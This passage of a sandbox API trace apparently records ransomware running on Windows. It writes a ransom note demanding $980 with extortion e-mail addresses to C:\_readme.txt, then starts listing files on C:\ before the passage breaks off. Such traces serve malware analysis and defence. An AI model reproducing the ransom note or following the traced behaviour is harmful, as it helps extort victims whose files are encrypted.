[0142.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.626] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.626] PathFindFileNameW (pszPath="") returned="" [0142.626] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.627] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3290eb8 [0142.627] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3290eb8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aaf2b8 [0142.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1f50 [0142.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.627] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1f50 | out: hHeap=0x620000) returned 1 [0142.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0142.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x806) returned 0x3290eb8 [0142.628] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0142.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aaf2b8 [0142.628] PathFileExistsW (pszPath="C:\\_readme.txt") returned 0 [0142.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.629] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.629] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aafb40 [0142.629] CreateFileW (lpFileName="C:\\_readme.txt" (normalized: "c:\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 1116 [0142.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.630] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.630] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.631] CloseHandle (hObject=0x6f0) returned 1 [0142.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0142.632] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x3275b30 [0142.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1f50 [0142.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x320f880 [0142.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1f50 | out: hHeap=0x620000) returned 1 [0142.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x320f7a0 [0142.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x9ac1f50 [0142.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x320fbc8 [0142.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x320f7a0 | out: hHeap=0x620000) returned 1 [0142.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x320f880 | out: hHeap=0x620000) returned 1 [0142.633] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0142.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1f28 [0142.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x38) returned 0x3275b70 [0142.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x320f880 [0142.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x320fbc8 | out: hHeap=0x620000) returned 1 [0142.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1f50 | out: hHeap=0x620000) returned 1 [0142.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1f50 [0142.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1f28 | out: hHeap=0x620000) returned 1 [0142.633] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0142.633] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0142.633] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0142.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1f28 [0142.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x54) returned 0x9ac3460 [0142.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x320fbc8 [0142.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1988 [0142.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x320f880 | out: hHeap=0x620000) returned 1 [0142.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1f50 | out: hHeap=0x620000) returned 1 [0142.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3275b70 | out: hHeap=0x620000) returned 1 [0142.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1f50 [0142.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1f28 | out: hHeap=0x620000) returned 1 [0142.633] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0142.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0142.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fe8 [0142.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3280a80 [0142.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x320f880 [0142.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1f28 [0142.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x320fbc8 | out: hHeap=0x620000) returned 1 [0142.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1988 | out: hHeap=0x620000) returned 1 [0142.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1f50 | out: hHeap=0x620000) returned 1 [0142.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac3460 | out: hHeap=0x620000) returned 1 [0142.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283fe8 | out: hHeap=0x620000) returned 1 [0142.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283fa0 | out: hHeap=0x620000) returned 1 [0142.634] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0142.634] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0142.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1f50 [0142.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1988 [0142.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa8) returned 0x3203a90 [0142.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x320fbc8 [0142.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1d20 [0142.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a78 [0142.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0142.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x320f880 | out: hHeap=0x620000) returned 1 [0142.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1f28 | out: hHeap=0x620000) returned 1 [0142.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3280a80 | out: hHeap=0x620000) returned 1 [0142.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1988 | out: hHeap=0x620000) returned 1 [0142.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1f50 | out: hHeap=0x620000) returned 1 [0142.634] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0142.634] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0142.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1f50 [0142.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1988 [0142.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1f28 [0142.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1988 | out: hHeap=0x620000) returned 1 [0142.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1f50 | out: hHeap=0x620000) returned 1 [0142.635] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd84a200, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xfd84a200, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0142.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x320f880 [0142.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x320f7a0 [0142.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfc) returned 0x3282668 [0142.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x320fce0 [0142.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1f50 [0142.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1988 [0142.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x320fbc8 | out: hHeap=0x620000) returned 1 [0142.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1d20 | out: hHeap=0x620000) returned 1 [0142.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a78 | out: hHeap=0x620000) returned 1 [0142.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283fa0 | out: hHeap=0x620000) returned 1 [0142.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 